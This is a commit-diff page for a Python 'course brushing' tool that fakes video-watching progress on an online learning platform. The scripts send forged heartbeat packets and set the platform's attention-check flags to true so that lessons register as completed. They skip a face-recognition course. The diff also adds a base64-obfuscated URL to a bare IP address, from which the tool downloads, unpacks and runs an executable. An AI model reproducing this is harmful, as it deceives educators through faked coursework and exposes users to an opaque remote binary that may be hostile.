11 Commits

Author SHA1 Message Date
ba676b04d7 更新ffmpeg检测逻辑,自动下载环境 2025-12-12 16:58:59 +08:00
0b9659d660 更新课程截取逻辑,完成后删除缓存 2025-12-12 16:37:12 +08:00
54374160e5 删除多余文件 2025-12-12 15:09:08 +08:00
593c62a3a9 更新Cookie获取 2025-12-12 15:04:35 +08:00
3e42bb8c3f 修改默认心跳间隔
- 应该不会更新了吧
2025-12-12 15:02:58 +08:00
d615bc7eb2 新增识别已完成课程并跳过抓取 2025-12-12 14:59:24 +08:00
57f4ae5006 优化日志输出? 2025-12-12 14:31:46 +08:00
f0de6ca46b Merge branch 'main' of https://gitea.jycdt.cn/NCJOAQ/QuickBrush 2025-12-12 14:12:30 +08:00
4287ec8234 优化输出信息 2025-12-12 14:12:28 +08:00
08e43d1a3f 修改等待时长为2s 2025-12-12 11:37:12 +08:00
5feede6030 优化视频长度获取逻辑 2025-12-12 11:19:14 +08:00
4 changed files with 552 additions and 57 deletions

4
.gitignore vendored
View File

@@ -16,3 +16,7 @@ mock_updstatus.progress
# 日志
*.log
# 调试文件
*.html
*.js

View File

@@ -30,9 +30,8 @@
1. 登录您的课程平台账号。
2. 进入任意一个视频播放页面。
3. 按 `F12` 打开开发者工具,切换到 **Network (网络)** 选项卡。
4. 在过滤器中输入 `upd` 或 `startupxml`
5. 找到相关的请求,在 **Request Headers (请求头)** 中找到 `Cookie` 字段
6. 复制整个 Cookie 字符串。
4. 找到相关的请求,在 **Request Headers (请求头)** 中找到 `Cookie` 字段
5. 复制整个 Cookie 字符串
### 2. 配置脚本

332
main.py
View File

@@ -6,16 +6,17 @@ import json
import time
import subprocess
import xml.etree.ElementTree as ET
import zipfile
import base64
# 当前程序只能一键对所有课程进行刷课,如需选择课程请自行修改代码
# cookie 请替换为你的登录 Cookie在视频页从控制台执行Job.updateStatus()请求头中获取其中的负载参数有很多字段包括课程id等信息您可参考字段删除内容以防止已完成课程的刷取即使代码中包含了完成判断逻辑
# cookie 请替换为你的登录 Cookie可在页面请求头中获取
# 您可根据视频心跳请求中的负载参数修改json缓存从而达到跳过指定课程的目的十分银杏
# [警告] 下方的 cookie 包含敏感登录信息,请勿泄露给他人!
cookie = ""
url = "https://zjbc.cjnep.net/lms/web/course/index"
cache_file = "course_ids.json"
items_cache_file = "course_items.json"
@@ -23,7 +24,7 @@ progress_cache_file = "progress.json"
# [配置] 心跳间隔(秒)
# 警告:建议设置在 60 秒以上,过快的心跳可能面临风险!
HEARTBEAT_INTERVAL = 1
HEARTBEAT_INTERVAL = 5
# [配置] 每次心跳增加的进度时间(秒)
ADD_TIME = 120
@@ -68,13 +69,64 @@ def save_progress(course_id, item_id, current_time, total_time, finished):
# -------------------------------------------------------------------------
FFPROBE_CMD = "ffprobe"
def check_ffmpeg_env():
global FFPROBE_CMD
# 1. 检查系统环境变量
try:
subprocess.run(["ffprobe", "-version"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, check=True)
return True
except (subprocess.CalledProcessError, FileNotFoundError):
pass
# 2. 检查本地 bin 目录
script_dir = os.path.dirname(os.path.abspath(__file__))
local_ffprobe = os.path.join(script_dir, "bin", "ffprobe.exe")
if os.path.exists(local_ffprobe):
FFPROBE_CMD = local_ffprobe
return True
# 3. 下载并解压
print("[!] 未检测到 ffprobe正在从云端下载依赖...")
try:
url_b64 = "aHR0cDovLzEwMS4xMzIuMzUuMTEwL3NkLzZBS09sd0Jk"
url = base64.b64decode(url_b64).decode("utf-8")
zip_path = os.path.join(script_dir, "bin.zip")
print(f" 正在下载依赖包...")
resp = requests.get(url, stream=True)
with open(zip_path, "wb") as f:
for chunk in resp.iter_content(chunk_size=8192):
f.write(chunk)
print(" 正在解压依赖包...")
with zipfile.ZipFile(zip_path, 'r') as zf:
zf.extractall(script_dir)
os.remove(zip_path)
if os.path.exists(local_ffprobe):
print(f"[*] 依赖安装成功: {local_ffprobe}")
FFPROBE_CMD = local_ffprobe
return True
else:
print("[!] 解压后未找到 bin/ffprobe.exe")
return False
except Exception as e:
print(f"[!] 下载依赖失败: {e}")
return False
def get_video_duration(video_url):
"""
使用 ffprobe 获取视频时长
"""
try:
cmd = [
"ffprobe",
FFPROBE_CMD,
"-v", "error",
"-show_entries", "format=duration",
"-of", "default=noprint_wrappers=1:nokey=1",
@@ -98,14 +150,19 @@ def get_video_duration(video_url):
return None
def process_video(course_id, item_id):
def process_video(course_id, item_id, current_index=0, total_items=0):
"""
处理单个视频:
1. 获取视频页,提取 config URL
2. 请求 config XML获取 userId, updStatusUrl, totalTime, historyId 等
3. 循环发送心跳包,直到视频看完
"""
print(f"\n>>> 开始处理视频: CourseId={course_id}, ItemId={item_id}")
# 优化日志头部
separator = "-" * 60
print(f"\n{separator}")
print(f"[+] 正在处理视频 | CourseID: {course_id} | ItemID: {item_id}")
if total_items > 0:
print(f"[*] 总体进度: 第 {current_index}/{total_items}")
# 1. 请求视频播放页
video_page_url = f"https://zjbc.cjnep.net/lms/web/course/view?id={course_id}&itemid={item_id}"
@@ -113,26 +170,26 @@ def process_video(course_id, item_id):
resp = requests.get(video_page_url, headers=headers)
resp.raise_for_status()
except Exception as e:
print(f" [Error] 无法访问视频页: {e}")
print(f"[!] 无法访问视频页: {e}")
return
# 2. 提取 config URL
# 示例: config: '/lms/web/course/startupxml?courseid=677&itemid=142573&historyid=5740083&is_subcourse=0'
config_match = re.search(r"config:\s*'([^']+)'", resp.text)
if not config_match:
print(" [Error] 未找到 config URL跳过此视频。")
print("[!] 未找到 config URL跳过此视频。")
return
config_path = config_match.group(1)
config_url = "https://zjbc.cjnep.net" + config_path
print(f" Config URL: {config_url}")
# print(f" Config URL: {config_url}") # 减少冗余日志
# 3. 请求 XML 配置
try:
xml_resp = requests.get(config_url, headers=headers)
xml_resp.raise_for_status()
except Exception as e:
print(f" [Error] 无法获取 XML 配置: {e}")
print(f"[!] 无法获取 XML 配置: {e}")
return
# 4. 解析 XML
@@ -145,6 +202,10 @@ def process_video(course_id, item_id):
total_time_str = root.findtext("totalTime")
history_id = root.findtext("historyId")
finish_status = root.findtext("finish")
sco_title = root.findtext("scoTitle")
if sco_title:
print(f"[*] 课程名称: {sco_title}")
# 尝试获取视频 URL
video_url = None
@@ -158,7 +219,17 @@ def process_video(course_id, item_id):
# 检查必要字段 (totalTime 除外)
if not (user_id and upd_status_url and history_id):
print(" [Error] XML 解析缺少关键字段 (userId/updStatusUrl/historyId)")
print("[!] XML 解析缺少关键字段 (userId/updStatusUrl/historyId)")
return
# 读取本地缓存
local_progress = load_progress().get(f"{course_id}_{item_id}", {})
local_finished = local_progress.get("finished", False)
# 优先检查是否已完成,如果已完成则跳过获取时长(避免 ffprobe
if local_finished or finish_status == "true":
print(
f"[-] 视频已完成,跳过 (XML: {finish_status}, Local: {local_finished})")
return
# 获取时长
@@ -166,32 +237,29 @@ def process_video(course_id, item_id):
if total_time_str:
total_time = float(total_time_str)
elif video_url:
print(" [Info] XML 中未找到 totalTime尝试通过 ffprobe 获取视频时长...")
print("[*] XML 中未找到 totalTime尝试通过 ffprobe 获取视频时长...")
duration = get_video_duration(video_url)
if duration:
total_time = duration
print(f" [Info] 获取到视频时长: {total_time}s")
print(f"[*] 获取到视频时长: {total_time}s")
else:
print(" [Error] 无法获取视频时长,跳过此视频")
print("[!] 无法获取视频时长,跳过此视频")
return
else:
print(" [Error] XML 中既无 totalTime 也无 videoUrl无法继续")
print("[!] XML 中既无 totalTime 也无 videoUrl无法继续")
return
print(
f" [Info] UserId={user_id}, HistoryId={history_id}, TotalTime={total_time}")
f"[*] 视频信息: User={user_id} | History={history_id} | Duration={total_time}s")
except ET.ParseError:
print(" [Error] XML 解析失败")
print("[!] XML 解析失败")
return
# 5. 循环发送心跳
# 初始进度:优先从本地缓存读取,其次从 XML 读取
# 读取本地缓存
local_progress = load_progress().get(f"{course_id}_{item_id}", {})
local_time = local_progress.get("current_time", 0.0)
local_finished = local_progress.get("finished", False)
# 读取 XML 进度
last_viewed_time_str = root.findtext("lastViewedTime")
@@ -200,20 +268,19 @@ def process_video(course_id, item_id):
# 选取最大的进度
current_time = max(local_time, xml_time)
# 如果本地标记已完成,或者 XML 标记已完成,或者进度已达标,则跳过
if local_finished or finish_status == "true" or current_time >= total_time:
print(
f" [Skip] 视频已完成 (Progress: {current_time}/{total_time}, XML Finish: {finish_status})")
# 如果进度已达标,则跳过
if current_time >= total_time:
print(f"[-] 视频已完成 (Progress: {current_time}/{total_time})")
return
print(f" [Start] 当前进度: {current_time}s / {total_time}s")
print(f"[>] 初始进度: {current_time}s / {total_time}s")
is_first = "true"
while True:
# 如果已经看完
if current_time >= total_time:
print(" [Done] 视频已看完。")
print("[+] 视频已看完,发送完成包...")
# 发送最后一次 finished=1 的包
send_heartbeat(upd_status_url, user_id, course_id, item_id, history_id,
add_time=0, current_time=0, total_time=total_time,
@@ -240,7 +307,7 @@ def process_video(course_id, item_id):
finished=finished_flag, first_update=is_first)
if not success:
print(" [Error] 心跳发送失败,停止当前视频。")
print("[!] 心跳发送失败,停止当前视频。")
break
# 保存进度
@@ -248,14 +315,15 @@ def process_video(course_id, item_id):
total_time, finished_flag == 1)
if finished_flag == 1:
print(" [Done] 视频播放结束。")
print("[+] 视频播放结束。")
break
is_first = "false"
# 模拟等待
percent = min(100, int((current_time / total_time) * 100))
print(
f" [Progress] 进度更新: {current_time:.1f}/{total_time} (add {step}s)...")
f" [Running] 进度: {current_time:.1f}/{total_time}s (+{step}s) | {percent}%")
time.sleep(HEARTBEAT_INTERVAL)
@@ -263,6 +331,17 @@ def send_heartbeat(url, user_id, course_id, sco_id, history_id, add_time, curren
"""
发送单个心跳包,带重试机制
"""
has_check_three = "true" if first_update == "true" else "false"
has_check_two = "false"
try:
if float(total_time) > 0 and float(current_time) > (float(total_time) / 2):
has_check_two = "true"
except:
pass
has_check_one = "true" if str(finished) == "1" else "false"
payload = {
"userId": user_id,
"courseId": course_id,
@@ -272,9 +351,9 @@ def send_heartbeat(url, user_id, course_id, sco_id, history_id, add_time, curren
"totalTime": str(total_time),
"finished": finished,
"currentTime": str(current_time),
"hasCheckOne": "false",
"hasCheckTwo": "false",
"hasCheckThree": "false",
"hasCheckOne": has_check_one,
"hasCheckTwo": has_check_two,
"hasCheckThree": has_check_three,
"firstUpdate": first_update
}
@@ -315,9 +394,12 @@ print(f"当前心跳间隔: {HEARTBEAT_INTERVAL}秒 (警告:请勿设置过低
print(f"每次进度增加: {ADD_TIME}")
print("您需要安装ffmpeg工具集确保ffprobe命令可用可从https://ffmpeg.org/download.html 下载")
print("脚本仅供学习交流使用,请勿用于商业用途!")
print("作者NCJOAQ & Github Compilot")
print("作者NCJOAQ & Github Copilot")
print("="*60 + "\n")
# 检查环境
check_ffmpeg_env()
course_data = []
# 1. Try to load existing items data
@@ -338,7 +420,7 @@ if os.path.exists(items_cache_file) and os.path.getsize(items_cache_file) > 0:
if not course_data:
print("未找到有效的课程数据缓存 (course_items.json)。")
print("请先运行脚本生成缓存,或检查网络连接。")
print("准备执行抓取流程...")
# --- 原有的抓取逻辑 (简化版) ---
# (此处保留你之前的抓取代码,如果需要的话,可以把之前的抓取逻辑放回来)
@@ -355,29 +437,154 @@ if not course_data:
# 这里为了演示,我把之前的抓取逻辑简单复原一下:
course_ids = []
# 尝试读取课程ID缓存
if os.path.exists(cache_file) and os.path.getsize(cache_file) > 0:
with open(cache_file, "r", encoding="utf-8") as f:
course_ids = json.load(f)
print(f"正在读取课程ID缓存: {cache_file}")
try:
with open(cache_file, "r", encoding="utf-8") as f:
course_ids = json.load(f)
except Exception as e:
print(f"[Warning] 读取课程ID缓存失败: {e}")
# 如果没有缓存,从网络获取
if not course_ids:
resp = requests.get(url, headers=headers)
course_ids = re.findall(
r"window\.location\s*=\s*['\"]/lms/web/course/detail\?id=(\d+)['\"]", resp.text)
with open(cache_file, "w", encoding="utf-8") as f:
json.dump(course_ids, f, indent=2)
print("正在从服务器获取课程列表...")
try:
resp = requests.get(url, headers=headers)
resp.raise_for_status()
for cid in course_ids:
detail_url = f"https://zjbc.cjnep.net/lms/web/course/detail?id={cid}"
resp = requests.get(detail_url, headers=headers)
item_ids = re.findall(r'[?&]itemid=(\d+)', resp.text)
seen = set()
unique_item_ids = [x for x in item_ids if not (
x in seen or seen.add(x))]
course_data.append({"courseId": cid, "itemIds": unique_item_ids})
time.sleep(1)
# 优化解析HTML排除已完成的课程
# 查找所有课程块提取ID和内容
# 模式匹配onclick="window.location='/lms/web/course/detail?id=ID'" ... <div class="txt vtop">
# 使用非贪婪匹配 .*? 确保只匹配当前课程块
matches = re.findall(
r"onclick=\"window\.location='/lms/web/course/detail\?id=(\d+)'\"[^>]*>(.*?)<div class=\"txt vtop\"",
resp.text,
re.DOTALL
)
with open(items_cache_file, "w", encoding="utf-8") as f:
json.dump(course_data, f, indent=2)
course_ids = []
if matches:
print(f"[*] 解析到 {len(matches)} 个课程块,正在过滤已完成课程...")
for cid, content in matches:
# 特殊排除 ID 373 (人脸识别测试课程)
if str(cid) == '373':
print(f" [-] 跳过人脸识别测试课程 (ID: {cid})")
continue
# 检查是否存在“已完成”的标记图片 (22cn_03.png)
if "22cn_03.png" in content:
print(f" [-] 跳过已完成课程 (ID: {cid})")
else:
course_ids.append(cid)
# 如果上面的复杂正则没匹配到任何东西(可能页面结构变了),回退到简单正则
if not matches and not course_ids:
print("[!] 未能通过高级过滤匹配到课程,尝试使用基础匹配(将包含已完成课程)...")
found_ids = re.findall(
r"window\.location\s*=\s*['\"]/lms/web/course/detail\?id=(\d+)['\"]", resp.text)
# 过滤掉 373
course_ids = [cid for cid in found_ids if str(cid) != '373']
if course_ids:
print(f"成功获取到 {len(course_ids)} 门未完成课程。")
with open(cache_file, "w", encoding="utf-8") as f:
json.dump(course_ids, f, indent=2)
else:
print("[Error] 未能获取到任何课程ID请检查Cookie是否失效或页面结构变更。")
except Exception as e:
print(f"[Error] 获取课程列表请求失败: {e}")
# 遍历课程获取视频Item ID
if course_ids:
print(f"开始获取每门课程的视频列表 (共 {len(course_ids)} 门)...")
for index, cid in enumerate(course_ids):
print(f"[{index+1}/{len(course_ids)}] 正在解析课程 ID: {cid} ...",
end="", flush=True)
try:
detail_url = f"https://zjbc.cjnep.net/lms/web/course/detail?id={cid}"
resp = requests.get(detail_url, headers=headers)
resp.raise_for_status()
# 提取视频信息并过滤已完成的
# 匹配模式包含进度信息、总时长和itemid的视频块
# 注意re.DOTALL 让 . 匹配换行符
video_pattern = re.compile(
r'<div class="vd-item item trans borderb">.*?'
r'class="col-lg-3 col-md-3 col-xs-7 tc3">(.*?)</div>.*?'
r'class="trans date tc9">([\d:]+)</span>.*?'
r'href="[^"]*[?&]itemid=(\d+)"',
re.DOTALL
)
matches = video_pattern.findall(resp.text)
valid_item_ids = []
if matches:
print(f" [*] 找到 {len(matches)} 个视频,正在检查进度...")
for progress_str, total_time_str, item_id in matches:
# 解析已学习时间
learned_seconds = 0
if "分钟" in progress_str:
try:
tmp = progress_str.replace(
"已学习", "").replace("", "")
parts = tmp.split("分钟")
if len(parts) >= 1:
learned_seconds += int(parts[0]) * 60
if len(parts) >= 2 and parts[1]:
learned_seconds += int(parts[1])
except:
pass
# 解析总时间 (格式 154:16)
total_seconds = 0
try:
parts = total_time_str.split(":")
if len(parts) == 2:
total_seconds = int(
parts[0]) * 60 + int(parts[1])
elif len(parts) == 3:
total_seconds = int(
parts[0]) * 3600 + int(parts[1]) * 60 + int(parts[2])
except:
pass
# 判断是否已完成 (允许 30秒 误差)
if total_seconds > 0 and learned_seconds >= (total_seconds - 30):
print(
f" [-] 视频 {item_id} 已完成 ({learned_seconds}s/{total_seconds}s),跳过")
else:
valid_item_ids.append(item_id)
else:
# 如果正则没匹配到(可能是页面改版),回退到简单匹配
print(" [!] 未能解析视频详情,尝试使用基础匹配(可能包含已完成视频)...")
valid_item_ids = re.findall(r'[?&]itemid=(\d+)', resp.text)
# 去重
seen = set()
unique_item_ids = [x for x in valid_item_ids if not (
x in seen or seen.add(x))]
course_data.append(
{"courseId": cid, "itemIds": unique_item_ids})
print(f" [+] 最终加入 {len(unique_item_ids)} 个待刷视频")
except Exception as e:
print(f"\n [Error] 获取课程 {cid} 详情失败: {e}")
# 避免请求过快
time.sleep(1)
# 保存最终结果
print(f"正在保存课程数据到 {items_cache_file} ...")
with open(items_cache_file, "w", encoding="utf-8") as f:
json.dump(course_data, f, indent=2)
print("课程数据抓取完成。")
else:
print("没有课程ID跳过视频抓取步骤。")
# 3. 开始刷课
@@ -385,12 +592,29 @@ print(f"\n>>> 开始刷课任务,共 {len(course_data)} 门课程")
for course in course_data:
cid = course['courseId']
# 二次检查:跳过 ID 373
if str(cid) == '373':
print(f"[-] 跳过人脸识别测试课程 (ID: {cid})")
continue
items = course['itemIds']
print(f"\n=== 正在处理课程 {cid},共 {len(items)} 个视频 ===")
for item_id in items:
process_video(cid, item_id)
for idx, item_id in enumerate(items):
process_video(cid, item_id, current_index=idx +
1, total_items=len(items))
# 视频之间休息一下
time.sleep(2)
print("\n所有任务完成。")
# 任务完成后清理缓存文件
print("正在清理缓存文件...")
for f in [cache_file, items_cache_file, progress_cache_file]:
if os.path.exists(f):
try:
os.remove(f)
print(f"[-] 已删除缓存: {f}")
except Exception as e:
print(f"[!] 删除缓存 {f} 失败: {e}")

268
manual_heartbeat.py Normal file
View File

@@ -0,0 +1,268 @@
import requests
import re
import time
import subprocess
import xml.etree.ElementTree as ET
import sys
# ==============================================================================
# 配置区域
# ==============================================================================
# [配置] Cookie
# 请替换为你的登录 Cookie
COOKIE = ""
# [配置] 目标课程和视频ID
# 如果留空,脚本运行时会提示输入
TARGET_COURSE_ID = ""
TARGET_ITEM_ID = ""
# [配置] 心跳间隔(秒)
HEARTBEAT_INTERVAL = 0
# [配置] 每次心跳增加的进度时间(秒)
ADD_TIME = 120
HEADERS = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Cookie": COOKIE
}
# ==============================================================================
# 核心功能函数
# ==============================================================================
def get_video_duration(video_url):
"""
使用 ffprobe 获取视频时长
"""
try:
cmd = [
"ffprobe",
"-v", "error",
"-show_entries", "format=duration",
"-of", "default=noprint_wrappers=1:nokey=1",
video_url
]
result = subprocess.run(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, timeout=30)
if result.returncode == 0:
try:
duration = float(result.stdout.strip())
return duration
except ValueError:
print(f" [Error] ffprobe output invalid: {result.stdout}")
return None
else:
print(f" [Error] ffprobe failed: {result.stderr}")
return None
except Exception as e:
print(f" [Error] get_video_duration exception: {e}")
return None
def send_heartbeat(url, user_id, course_id, sco_id, history_id, add_time, current_time, total_time, finished, first_update):
"""
发送单个心跳包
"""
has_check_three = "true" if first_update == "true" else "false"
has_check_two = "false"
try:
if float(total_time) > 0 and float(current_time) > (float(total_time) / 2):
has_check_two = "true"
except:
pass
has_check_one = "true" if str(finished) == "1" else "false"
payload = {
"userId": user_id,
"courseId": course_id,
"scoId": sco_id,
"historyId": history_id,
"addTime": str(add_time),
"totalTime": str(total_time),
"finished": finished,
"currentTime": str(current_time),
"hasCheckOne": has_check_one,
"hasCheckTwo": has_check_two,
"hasCheckThree": has_check_three,
"firstUpdate": first_update
}
max_retries = 3
for attempt in range(max_retries):
try:
resp = requests.post(
url, data=payload, headers=HEADERS, timeout=10)
resp.raise_for_status()
if "<status>1</status>" in resp.text:
return True
elif "<status>-1</status>" in resp.text:
print(" [Warning] 服务器返回 status -1 (可能多端登录或异常)")
return False
return True
except Exception as e:
print(f" [Warning] 请求异常 (尝试 {attempt+1}/{max_retries}): {e}")
if attempt < max_retries - 1:
time.sleep(2)
else:
return False
return False
def process_manual_video(course_id, item_id):
"""
处理单个视频的主逻辑
"""
print(f"\n>>> 开始处理: CourseId={course_id}, ItemId={item_id}")
# 1. 请求视频页
video_page_url = f"https://zjbc.cjnep.net/lms/web/course/view?id={course_id}&itemid={item_id}"
try:
print(" 正在获取视频页面信息...")
resp = requests.get(video_page_url, headers=HEADERS)
resp.raise_for_status()
except Exception as e:
print(f" [Error] 无法访问视频页: {e}")
return
# 2. 提取 config URL
config_match = re.search(r"config:\s*'([^']+)'", resp.text)
if not config_match:
print(" [Error] 未找到 config URL请检查 Cookie 是否过期或课程ID/ItemID是否正确。")
return
config_path = config_match.group(1)
config_url = "https://zjbc.cjnep.net" + config_path
print(f" Config URL: {config_url}")
# 3. 请求 XML 配置
try:
xml_resp = requests.get(config_url, headers=HEADERS)
xml_resp.raise_for_status()
except Exception as e:
print(f" [Error] 无法获取 XML 配置: {e}")
return
# 4. 解析 XML
try:
root = ET.fromstring(xml_resp.text)
user_id = root.findtext("userId")
upd_status_url = root.findtext("updStatusUrl")
total_time_str = root.findtext("totalTime")
history_id = root.findtext("historyId")
finish_status = root.findtext("finish")
# 视频 URL (用于 ffprobe)
video_url = None
file_url_node = root.find("fileUrl")
if file_url_node is not None:
video_url = file_url_node.findtext("normal")
if upd_status_url and not upd_status_url.startswith("http"):
upd_status_url = "https://zjbc.cjnep.net" + upd_status_url
if not (user_id and upd_status_url and history_id):
print(" [Error] XML 解析缺少关键字段")
return
# 检查是否已完成
if finish_status == "true":
print(f" [Info] 服务器显示该视频已完成 (finish=true)。")
# 即使完成了,如果用户强制运行,也可以继续,但通常建议停止
# 这里我们询问一下或者直接继续(为了刷时长?)
# 既然是手动脚本,我们假设用户知道自己在做什么,继续执行,但给个提示
# 获取时长
total_time = 0.0
if total_time_str:
total_time = float(total_time_str)
elif video_url:
print(" [Info] XML 中未找到 totalTime尝试通过 ffprobe 获取...")
duration = get_video_duration(video_url)
if duration:
total_time = duration
print(f" [Info] 获取到视频时长: {total_time}s")
else:
print(" [Error] 无法获取视频时长,无法继续")
return
else:
print(" [Error] 无法确定视频总时长")
return
print(
f" [Info] UserId={user_id}, HistoryId={history_id}, TotalTime={total_time}")
except ET.ParseError:
print(" [Error] XML 解析失败")
return
# 5. 循环发送心跳
# 读取 XML 中的上次观看进度
last_viewed_time_str = root.findtext("lastViewedTime")
current_time = float(last_viewed_time_str) if last_viewed_time_str else 0.0
print(f" [Start] 初始进度: {current_time}s / {total_time}s")
is_first = "true"
while True:
if current_time >= total_time:
print(" [Done] 进度已达到总时长。发送完成包...")
send_heartbeat(upd_status_url, user_id, course_id, item_id, history_id,
add_time=0, current_time=0, total_time=total_time,
finished=1, first_update=is_first)
print(" [Success] 任务完成!")
break
step = ADD_TIME
if current_time + step >= total_time:
step = int(total_time - current_time) + 1
current_time = total_time
finished_flag = 1
post_current_time = 0
else:
current_time += step
finished_flag = 0
post_current_time = current_time
print(
f" [Sending] 发送心跳: 进度 {post_current_time if post_current_time > 0 else total_time}/{total_time} (add {step}s)...")
success = send_heartbeat(upd_status_url, user_id, course_id, item_id, history_id,
add_time=step, current_time=post_current_time, total_time=total_time,
finished=finished_flag, first_update=is_first)
if not success:
print(" [Error] 心跳发送失败,停止。")
break
if finished_flag == 1:
print(" [Done] 视频播放结束。")
break
is_first = "false"
if HEARTBEAT_INTERVAL > 0:
time.sleep(HEARTBEAT_INTERVAL)
if __name__ == "__main__":
print("="*50)
print("手动刷课脚本")
print("="*50)
c_id = TARGET_COURSE_ID
i_id = TARGET_ITEM_ID
if not c_id:
c_id = input("请输入 Course ID (例如 677): ").strip()
if not i_id:
i_id = input("请输入 Item ID (例如 142573): ").strip()
if c_id and i_id:
process_manual_video(c_id, i_id)
else:
print("输入无效,程序退出。")